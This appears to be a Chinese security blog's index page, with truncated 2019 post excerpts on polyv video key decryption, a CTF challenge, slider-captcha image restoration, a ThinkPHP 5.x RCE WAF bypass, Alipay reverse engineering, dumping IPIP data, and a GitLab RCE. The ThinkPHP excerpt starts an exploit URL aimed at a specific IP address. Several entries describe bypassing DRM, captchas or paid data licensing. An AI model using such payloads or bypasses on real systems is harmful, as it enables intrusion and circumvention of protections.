保利威视频云(polyv.net) HLS视频解密 保利威视频云(polyv.net) HLS视频解密通过chrome抓包可以看到几个重要文件,其中josn是配置文件,m3u8中是加密的视频文件链接,key是播放密钥。 json文件是加密内容。json解密的key和iv是文件名的md5值。解密后的内容中包含m3u8的链接、解密.key文件的参数。 .key和.m3u8的文件的内容: 播放密钥(.key)有32字节,解密需要的ase-key为md5 2019-12-27 note
2019看雪CTF-Q4-南充茶馆 2019看雪CTF-Q4-南充茶馆解压exe后出现了两个文件,CM.exe和一个dll。调试后发现会释放一些文件到Temp目录下,包含一些编译成PE文件的Python库(pyd)、态链接库(dll)、压缩包(zip),然后调用NtCreateUserProcess启动一个子进程。子进程中会创建Python运行环境,核心逻辑就是通过Python代码实现的。 尝试直接用x64dbg调试,只能定位到一段 2019-12-06 note
同盾滑动验证码图片还原 同盾滑动验证码图片还原在线体验地址:https://x.tongdun.cn/onlineExperience/slidingPuzzle 调试步骤和极验一样,都是在Canvas相关函数下断点。 图片宽度为320,高度为180。按8列、2行分割成16个块。只需要确定这16个块的顺序,就可以还原图片。与极验固定的块顺序不同,同盾的块顺序是随机的,且需要根据返回的数据进行计算才能得到。 验证码初始化的 2019-10-25 note
极验滑动验证码图片还原 极验滑动验证码图片还原极验的图片进行了分块乱序处理,本地加载后,会通过JavaScript对图片进行还原。下载的图片: 调试方法: 在创建Canvas的函数上设置断点。 刷新验证码,会在创建Canvas的地方断下来。 一直单步,直到还原后的图像显示出来。 在console中执行z=i,将此时的i保存为全局变量。退出单步,刷新验证码,再次断到创建Canvas的地方,此时在console中执 2019-10-24 note
ThinkPHP 5.x RCE 绕部分WAF ThinkPHP 5.x RCE 绕部分WAF1234567891011121314151617181920http://149.129.91.93:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&var 2019-09-19 note
定位支付宝删除好友函数 定位支付宝删除好友函数通过uiautomatorviewer工具可以确定好友管理页面的Activity为:com.alipay.android.phone.wallet.profileapp.ui.ProfileSettingActivity。下图中的set_delete为删除好友的按钮。通过追踪OnClick最终找到了删除好友的函数。 1234// OnClickelse if(arg10 = 2019-09-02 note
IPIP数据库解析 IPIP数据库解析背景IPIP的IPv4库每日旗舰版数据库中包含IDC、基站等数据,而IDC地址列表、基站IP是单独收费的。很多场景需要完整的IDC IP列表,所以尝试从IPv4库每日旗舰版数据库中dump出所有IDC IP。 存储结构文件头 + 数据块文件头中包含版本、数据块数量等信息。数据块中包含索引信息、IP数据块,IP数据块又分为长度+IP信息。 代码分析以14.215.177.39为例, 2019-08-27 note
xposed编译 xposed编译环境准备:修改perl包安装源 1234perl -MCPAN -e shellcpan> o conf init'urllist' => [q[http://mirrors.neusoft.edu.cn/cpan/], q[http://cpan.perl.org]], 123perl -MCPAN -e 'install Config: 2019-08-20 note
Gitlab RCE Gitlab RCEhttps://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ 1234567891011utf8=%E2%9C%93&authenticity_token=aBQJGxvAJfAwdnY%2BlbcsT90CvEuAULfbCHmWzBta7Ni6S 2019-08-01 note